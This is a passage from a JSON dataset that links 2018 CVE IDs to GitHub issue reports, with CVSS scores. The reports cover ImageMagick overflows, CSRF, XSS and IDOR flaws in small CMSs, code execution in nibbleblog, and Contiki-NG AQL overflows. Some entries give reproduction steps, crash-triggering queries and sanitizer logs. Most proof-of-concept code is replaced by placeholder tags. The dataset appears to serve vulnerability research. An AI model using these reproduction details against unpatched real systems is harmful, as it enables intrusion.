NUMBERTAG generic APITAG Ubuntu SMP Fri Feb NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: APITAG May I know whether this can be assigned with a CVE ID?",
  24683. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24684. "severity": "HIGH",
  24685. "baseScore": 8.8,
  24686. "impactScore": 5.9,
  24687. "exploitabilityScore": 2.8
  24688. },
  24689. {
  24690. "CVE_ID": "CVE-2018-16413",
  24691. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1249",
  24692. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1249",
  24693. "Repo_new": "imagemagick/imagemagick",
  24694. "Issue_Created_At": "2018-08-16T12:19:36Z",
  24695. "description": "heap buffer overflow bug in APITAG private.h:. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch $ uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: May I know whether this can be assigned with a CVE ID? APITAG",
  24696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24697. "severity": "HIGH",
  24698. "baseScore": 8.8,
  24699. "impactScore": 5.9,
  24700. "exploitabilityScore": 2.8
  24701. },
  24702. {
  24703. "CVE_ID": "CVE-2018-16416",
  24704. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/481",
  24705. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/481",
  24706. "Repo_new": "daylightstudio/fuel-cms",
  24707. "Issue_Created_At": "2018-08-27T23:57:21Z",
  24708. "description": "Cross site request forgery (CSRF) vulnerability. Cross site request forgery (CSRF) vulnerability in \" URLTAG \" in FUELCMS NUMBERTAG allows remote attackers to hijack the authentication of unspecified users for requests that change administrator's password poc\uff1a CODETAG",
  24709. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24710. "severity": "HIGH",
  24711. "baseScore": 8.8,
  24712. "impactScore": 5.9,
  24713. "exploitabilityScore": 2.8
  24714. },
  24715. {
  24716. "CVE_ID": "CVE-2018-16435",
  24717. "Issue_Url_old": "https://github.com/mm2/Little-CMS/issues/171",
  24718. "Issue_Url_new": "https://github.com/mm2/little-cms/issues/171",
  24719. "Repo_new": "mm2/little-cms",
  24720. "Issue_Created_At": "2018-08-14T01:36:36Z",
  24721. "description": "Heap Buffer Overflow in APITAG VULNERABILITY DETAILS I have audited source code of lcms library and I have founded a vulnerability in APITAG FILETAG FILETAG FILETAG function (cmscgats.c). The attached it8 could crash lcms when ASAN was enabled on Linux. ERRORTAG if APITAG is NUMBERTAG and APITAG is NUMBERTAG APITAG is larger than the maximum representable value NUMBERTAG ffffffff). The result of an overflow is that the least significant representable bits of the result are stored. Data will point to a small memory region and can not use to store large data. REPRODUCTION CASE Following code will trigger crash CODETAG ASAN Log: ERRORTAG PATCH ERRORTAG I have checked the lastest version of LCMS. The vulnerability still exists. URLTAG",
  24722. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24723. "severity": "MEDIUM",
  24724. "baseScore": 5.5,
  24725. "impactScore": 3.6,
  24726. "exploitabilityScore": 1.8
  24727. },
  24728. {
  24729. "CVE_ID": "CVE-2018-16447",
  24730. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/12",
  24731. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/12",
  24732. "Repo_new": "philippe/frogcms",
  24733. "Issue_Created_At": "2018-08-10T05:48:34Z",
  24734. "description": "There is a CSRF in page URLTAG FILETAG I wrote a test script for CSRF. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG Success\uff01\uff01\uff01 FILETAG",
  24735. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24736. "severity": "HIGH",
  24737. "baseScore": 8.8,
  24738. "impactScore": 5.9,
  24739. "exploitabilityScore": 2.8
  24740. },
  24741. {
  24742. "CVE_ID": "CVE-2018-16448",
  24743. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/1",
  24744. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/1",
  24745. "Repo_new": "chshcms/cscms",
  24746. "Issue_Created_At": "2018-08-10T13:50:34Z",
  24747. "description": "There is a CSRF vulnerability that creates vip members and administrators, and it can also modify administrator's passwords and authenticate vip members.. first: Create a member FILETAG FILETAG second\uff1a authenticate vip members. FILETAG FILETAG third: Create a super administrator and web editor. FILETAG FILETAG",
  24748. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  24749. "severity": "HIGH",
  24750. "baseScore": 8.8,
  24751. "impactScore": 5.9,
  24752. "exploitabilityScore": 2.8
  24753. },
  24754. {
  24755. "CVE_ID": "CVE-2018-16449",
  24756. "Issue_Url_old": "https://github.com/liu21st/onethink/issues/37",
  24757. "Issue_Url_new": "https://github.com/liu21st/onethink/issues/37",
  24758. "Repo_new": "liu21st/onethink",
  24759. "Issue_Created_At": "2018-08-24T11:43:02Z",
  24760. "description": "There are three CSRF vulnerabilities that can add pages to the website home page. After the Administrator logged in,open the following two pages. poc: FILETAG add a page to the website home page and can jump to designated website. CODETAG FILETAG add a blog and through the audit. CODETAG FILETAG FILETAG FILETAG FILETAG",
  24761. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24762. "severity": "MEDIUM",
  24763. "baseScore": 6.5,
  24764. "impactScore": 3.6,
  24765. "exploitabilityScore": 2.8
  24766. },
  24767. {
  24768. "CVE_ID": "CVE-2018-16458",
  24769. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/5",
  24770. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/5",
  24771. "Repo_new": "baigostudio/baigocms",
  24772. "Issue_Created_At": "2018-09-04T07:31:52Z",
  24773. "description": "Cross site request forgery (CSRF) vulnerability. Cross site request forgery (CSRF) vulnerability in \" URLTAG \" in APITAG NUMBERTAG Can publish articles at will poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  24774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  24775. "severity": "MEDIUM",
  24776. "baseScore": 6.5,
  24777. "impactScore": 3.6,
  24778. "exploitabilityScore": 2.8
  24779. },
  24780. {
  24781. "CVE_ID": "CVE-2018-16468",
  24782. "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/154",
  24783. "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/154",
  24784. "Repo_new": "flavorjones/loofah",
  24785. "Issue_Created_At": "2018-10-27T19:06:55Z",
  24786. "description": "placeholder security vulnerability.",
  24787. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24788. "severity": "MEDIUM",
  24789. "baseScore": 5.4,
  24790. "impactScore": 2.7,
  24791. "exploitabilityScore": 2.3
  24792. },
  24793. {
  24794. "CVE_ID": "CVE-2018-16515",
  24795. "Issue_Url_old": "https://github.com/matrix-org/synapse/issues/3796",
  24796. "Issue_Url_new": "https://github.com/matrix-org/synapse/issues/3796",
  24797. "Repo_new": "matrix-org/synapse",
  24798. "Issue_Created_At": "2018-09-05T15:32:49Z",
  24799. "description": "CVETAG . This is a placeholder for the security issues identified by CVETAG CVETAG .",
  24800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24801. "severity": "HIGH",
  24802. "baseScore": 8.8,
  24803. "impactScore": 5.9,
  24804. "exploitabilityScore": 2.8
  24805. },
  24806. {
  24807. "CVE_ID": "CVE-2018-16548",
  24808. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/58",
  24809. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/58",
  24810. "Repo_new": "gdraheim/zziplib",
  24811. "Issue_Created_At": "2018-09-05T07:47:08Z",
  24812. "description": "There are memory leaks in zziplib NUMBERTAG which is trigged in APITAG APITAG There are memory leaks in zziplib NUMBERTAG which is trigged in APITAG APITAG I wrote a demo based on the documentation. CODETAG when i use [( URLTAG memory leak happened ERRORTAG It seems hdr0 doesn't free correctly in some cases.",
  24813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24814. "severity": "MEDIUM",
  24815. "baseScore": 6.5,
  24816. "impactScore": 3.6,
  24817. "exploitabilityScore": 2.8
  24818. },
  24819. {
  24820. "CVE_ID": "CVE-2018-16551",
  24821. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/259",
  24822. "Issue_Url_new": "https://github.com/lavalite/cms/issues/259",
  24823. "Repo_new": "lavalite/cms",
  24824. "Issue_Created_At": "2018-09-04T02:44:50Z",
  24825. "description": "find.",
  24826. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24827. "severity": "MEDIUM",
  24828. "baseScore": 5.4,
  24829. "impactScore": 2.7,
  24830. "exploitabilityScore": 2.3
  24831. },
  24832. {
  24833. "CVE_ID": "CVE-2018-16604",
  24834. "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/131",
  24835. "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/131",
  24836. "Repo_new": "dignajar/nibbleblog",
  24837. "Issue_Created_At": "2018-09-06T10:05:20Z",
  24838. "description": "someone can getshell with admin's password. It allows Remote Code execution by changing username to PHP code. (for APITAG Consequently, an attacker can execute arbitrary PHP code by changing username. The reason is because the username is surrounded by double quotes NUMBERTAG username is \"admin\" CODETAG NUMBERTAG username change to APITAG ( URLTAG FILETAG APITAG FILETAG",
  24839. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  24840. "severity": "HIGH",
  24841. "baseScore": 7.2,
  24842. "impactScore": 5.9,
  24843. "exploitabilityScore": 1.2
  24844. },
  24845. {
  24846. "CVE_ID": "CVE-2018-16608",
  24847. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/453",
  24848. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/453",
  24849. "Repo_new": "monstra-cms/monstra",
  24850. "Issue_Created_At": "2018-08-16T12:55:51Z",
  24851. "description": "Insecure direct object reference. FILETAG Vulnerable URL: ' URLTAG Hello sir, I have found a Insecure Direct Object Reference vulnerability in Monstra NUMBERTAG in the vulnerable URL page. Here I was able to change the password of an administrator user while being authenticated a user with APITAG role by changing the 'user_id' parameter to that of the target user. I have prepared and attached a doc with details of the vulnerability and steps to reproduce.",
  24852. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24853. "severity": "HIGH",
  24854. "baseScore": 8.8,
  24855. "impactScore": 5.9,
  24856. "exploitabilityScore": 2.8
  24857. },
  24858. {
  24859. "CVE_ID": "CVE-2018-16622",
  24860. "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/136",
  24861. "Issue_Url_new": "https://github.com/doramart/doracms/issues/136",
  24862. "Repo_new": "doramart/doracms",
  24863. "Issue_Created_At": "2018-04-18T01:56:08Z",
  24864. "description": "There is an XSS vulnerability here. After logging in to individual users, go to URLTAG Insert XSS payload in \u6458\u8981 and \u8be6\u60c5, publish; FILETAG The POC request is: FILETAG At URLTAG Pop up a web page window FILETAG Log in to the administrator demo account and go to the APITAG is test, please detele\u201d edit. Click 'XSS' to pop up a web page FILETAG",
  24865. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  24866. "severity": "MEDIUM",
  24867. "baseScore": 5.4,
  24868. "impactScore": 2.7,
  24869. "exploitabilityScore": 2.3
  24870. },
  24871. {
  24872. "CVE_ID": "CVE-2018-16636",
  24873. "Issue_Url_old": "https://github.com/NucleusCMS/NucleusCMS/issues/84",
  24874. "Issue_Url_new": "https://github.com/nucleuscms/nucleuscms/issues/84",
  24875. "Repo_new": "nucleuscms/nucleuscms",
  24876. "Issue_Created_At": "2018-08-21T05:43:03Z",
  24877. "description": "HTML Injection in Nucleus CMS NUMBERTAG Affected software: Nucleus CMS NUMBERTAG Type of vulnerability: HTML Injection Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Proof of concept: Step1: Login to the nucleus cms. Step2: URL: URLTAG Here the body parameter is vulnerable to HTML Injection. FILETAG Step3: Here the HTML injection got executed for body parameter. URL: URLTAG FILETAG",
  24878. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  24879. "severity": "MEDIUM",
  24880. "baseScore": 6.5,
  24881. "impactScore": 3.6,
  24882. "exploitabilityScore": 2.8
  24883. },
  24884. {
  24885. "CVE_ID": "CVE-2018-16640",
  24886. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1201",
  24887. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1201",
  24888. "Repo_new": "imagemagick/imagemagick",
  24889. "Issue_Created_At": "2018-07-06T12:20:04Z",
  24890. "description": "Potential memory leak in function APITAG in coders/png.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a potential memory leak vulnerability in APITAG function in coders/png.c. ( URLTAG As we can see, when chunk equals to NULL APITAG NUMBERTAG the program should call APITAG function firstly. Otherwise, there would be a memory leak vulnerability. Line NUMBERTAG Line NUMBERTAG and Line NUMBERTAG Line NUMBERTAG are the correct way to handle this condition. ERRORTAG APITAG version: current version APITAG version)",
  24891. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24892. "severity": "MEDIUM",
  24893. "baseScore": 6.5,
  24894. "impactScore": 3.6,
  24895. "exploitabilityScore": 2.8
  24896. },
  24897. {
  24898. "CVE_ID": "CVE-2018-16642",
  24899. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1162",
  24900. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1162",
  24901. "Repo_new": "imagemagick/imagemagick",
  24902. "Issue_Created_At": "2018-06-01T06:37:39Z",
  24903. "description": "There is a potential out of bound write bug in function APITAG APITAG Prerequisites Y] I have written a descriptive issue title [ Y] I have verified that I am using the latest version of APITAG [ Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a vulnerability named CVETAG . Below is the detailed information about the vulnerability. DESCRIPTION of CVETAG coders/wpg.c in APITAG allows remote attackers to cause a denial of service (out of bounds write) via a crafted file. ISSUE of CVETAG NUMBERTAG PATCH of CVETAG URLTAG URLTAG As we can see from the patch information, there was a fix in APITAG in coders/wpg.c. And it is similar to APITAG in coders/cuts.c. APITAG ( URLTAG ERRORTAG URLTAG APITAG ( FILETAG So, I think there should be a fix in APITAG in coders/cut.c. Steps to Reproduce APITAG System Configuration APITAG APITAG version: Environment APITAG system, version and so on): Additional information: APITAG",
  24904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24905. "severity": "MEDIUM",
  24906. "baseScore": 6.5,
  24907. "impactScore": 3.6,
  24908. "exploitabilityScore": 2.8
  24909. },
  24910. {
  24911. "CVE_ID": "CVE-2018-16643",
  24912. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1199",
  24913. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1199",
  24914. "Repo_new": "imagemagick/imagemagick",
  24915. "Issue_Created_At": "2018-07-05T03:29:31Z",
  24916. "description": "Missing check for fputc function in multiple files.. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There are NUMBERTAG functions APITAG APITAG APITAG APITAG that miss check for fputc function. As issued in NUMBERTAG And patch for NUMBERTAG is APITAG I think there should be add status flag when \"fputc(c, file) != c\". APITAG version: latest version",
  24917. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24918. "severity": "MEDIUM",
  24919. "baseScore": 6.5,
  24920. "impactScore": 3.6,
  24921. "exploitabilityScore": 2.8
  24922. },
  24923. {
  24924. "CVE_ID": "CVE-2018-16644",
  24925. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1269",
  24926. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1269",
  24927. "Repo_new": "imagemagick/imagemagick",
  24928. "Issue_Created_At": "2018-08-27T09:14:39Z",
  24929. "description": "Missing check for length in function APITAG of coders/dcm.c and function APITAG of coders/pict.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two missing check for variable length. ERRORTAG (coders/dcm.c) ERRORTAG (coders/pict.c) In my opinion, we should check whether length is bigger than APITAG or not. If condition APITAG satisfies, we should throw exception like ERRORTAG . APITAG version: latest version APITAG",
  24930. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24931. "severity": "MEDIUM",
  24932. "baseScore": 6.5,
  24933. "impactScore": 3.6,
  24934. "exploitabilityScore": 2.8
  24935. },
  24936. {
  24937. "CVE_ID": "CVE-2018-16645",
  24938. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1268",
  24939. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1268",
  24940. "Repo_new": "imagemagick/imagemagick",
  24941. "Issue_Created_At": "2018-08-27T08:59:26Z",
  24942. "description": "Potential Out of memory in function APITAG of coders/bmp.c and APITAG of codes/dib.c.. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two missing check for number_colors in function APITAG of coders/bmp.c and APITAG of codes/dib.c, which may lead to out of memory vulnerability. CODETAG ERRORTAG The patch for bmp and dib is similar. Below is the proposal patch for bmp.c. ERRORTAG APITAG version: latest version APITAG",
  24943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  24944. "severity": "MEDIUM",
  24945. "baseScore": 6.5,
  24946. "impactScore": 3.6,
  24947. "exploitabilityScore": 2.8
  24948. },
  24949. {
  24950. "CVE_ID": "CVE-2018-16663",
  24951. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/599",
  24952. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/599",
  24953. "Repo_new": "contiki-ng/contiki-ng",
  24954. "Issue_Created_At": "2018-07-09T16:47:47Z",
  24955. "description": "Stack based buffer overflow while parsing AQL (storage of relations). Macro AQL_ADD_RELATION write data into stack based fixed size buffer named relations without any check on number and sizes of added relations. Buffer is declared as: APITAG struct aql_adt { char APITAG NUMBERTAG db APITAG define AQL_RELATION_LIMIT NUMBERTAG db APITAG define RELATION_NAME_LENGTH NUMBERTAG usage: APITAG define AQL_ADD_RELATION(adt, rel) \\ strcpy((adt) >relations[(adt) >relation_count++], (rel)) Following AQL code samples will trigger crash: SELECT t FROM APITAG This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). Please take a note, that before going over the whole aql_adt structure firstly other values in the struct are overwritten, which may produce other integrity issues. The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Mitigation: Before adding relation to the struct the size of new relation and the number of already stored relations should be checked. Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): FILETAG FILETAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG at pc NUMBERTAG f NUMBERTAG e3d NUMBERTAG bp NUMBERTAG ffc8fd NUMBERTAG sp NUMBERTAG ffc8fd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG thread T NUMBERTAG f NUMBERTAG e3d NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG d in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG e NUMBERTAG c in parse_relations PATHTAG NUMBERTAG f7 in parse_relations PATHTAG NUMBERTAG f7 in parse_relations PATHTAG NUMBERTAG f7 in parse_select PATHTAG NUMBERTAG in aql_parse PATHTAG NUMBERTAG e in main PATHTAG NUMBERTAG f NUMBERTAG dfc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffc8fd NUMBERTAG f NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG bf in main PATHTAG This frame has NUMBERTAG object(s NUMBERTAG parsed_aql' APITAG NUMBERTAG fa6fe NUMBERTAG f4]f4 f4 f3 f3 f3 f NUMBERTAG fa6ff NUMBERTAG fa NUMBERTAG fa NUMBERTAG fa NUMBERTAG fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24956. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24957. "severity": "HIGH",
  24958. "baseScore": 7.8,
  24959. "impactScore": 5.9,
  24960. "exploitabilityScore": 1.8
  24961. },
  24962. {
  24963. "CVE_ID": "CVE-2018-16664",
  24964. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/596",
  24965. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/596",
  24966. "Repo_new": "contiki-ng/contiki-ng",
  24967. "Issue_Created_At": "2018-07-09T14:58:52Z",
  24968. "description": "Global buffer overflow while parsing AQL (lvm_set_op, lvm_set_relation, lvm_set_operand). Functions lvm_set_op, lvm_set_relation, lvm_set_operand try to memcpy input data (part of AQL files) into fixed size buffer lvm_instance_t >vmcode. Allocated buffer can fit only DB_VM_BYTECODE_SIZE NUMBERTAG bytes and the check is missing. Declaration: db APITAG define DB_VM_BYTECODE_SIZE NUMBERTAG aql APITAG static unsigned char vmcode[DB_VM_BYTECODE_SIZE]; This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment and buffer is filled with bytecode, not directly by user provided data APITAG APITAG The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG high) Following AQL code samples will trigger crash: APITAG REMOVE FROM aaa WHERE a NUMBERTAG COUNT a INLINE a TYPE NUMBERTAG a / APITAG NUMBERTAG bb NUMBERTAG f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24969. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24970. "severity": "HIGH",
  24971. "baseScore": 7.0,
  24972. "impactScore": 5.9,
  24973. "exploitabilityScore": 1.0
  24974. },
  24975. {
  24976. "CVE_ID": "CVE-2018-16665",
  24977. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/598",
  24978. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/598",
  24979. "Repo_new": "contiki-ng/contiki-ng",
  24980. "Issue_Created_At": "2018-07-09T15:09:23Z",
  24981. "description": "Global buffer overflow while parsing AQL (lvm_shift_for_operator). Function APITAG write data into global fixed size buffer named vmcode, with wrong size check. Buffer is declared as: db APITAG define DB_VM_BYTECODE_SIZE NUMBERTAG aql APITAG static unsigned char vmcode[DB_VM_BYTECODE_SIZE]; Following line (at lvm.c line NUMBERTAG moves the data by (sizeof(operator_t) + sizeof(node_type_t)) bytes to the right: memmove(ptr + sizeof(operator_t) + sizeof(node_type_t), ptr, old_end end); while following check (at lvm.c line NUMBERTAG adds only sizeof(operator_t): if(p >end + sizeof(operator_t) > p >size || end >= old_end) Following AQL code samples will trigger crash: SELECT a from a WHERE NUMBERTAG This buffer overflow is not likely to lead to Remote Code Execution, because size of overflow is only NUMBERTAG bytes. Therefore it is possible to only to crash the AQL engine or manipulate the data in other buffers, this leads to risk reduction APITAG APITAG APITAG Additionaly the risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG Medium) Mitigation: Following check (at line NUMBERTAG if(p >end + sizeof(operator_t) > p >size || end >= old_end) should be changed to: if(p >end + sizeof(operator_t) + sizeof(node_type_t) > p >size || end >= old_end) Crash details using Address Sanitizer NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG f NUMBERTAG d NUMBERTAG e NUMBERTAG bp NUMBERTAG ffe1f NUMBERTAG d0 sp NUMBERTAG ffe1f NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T 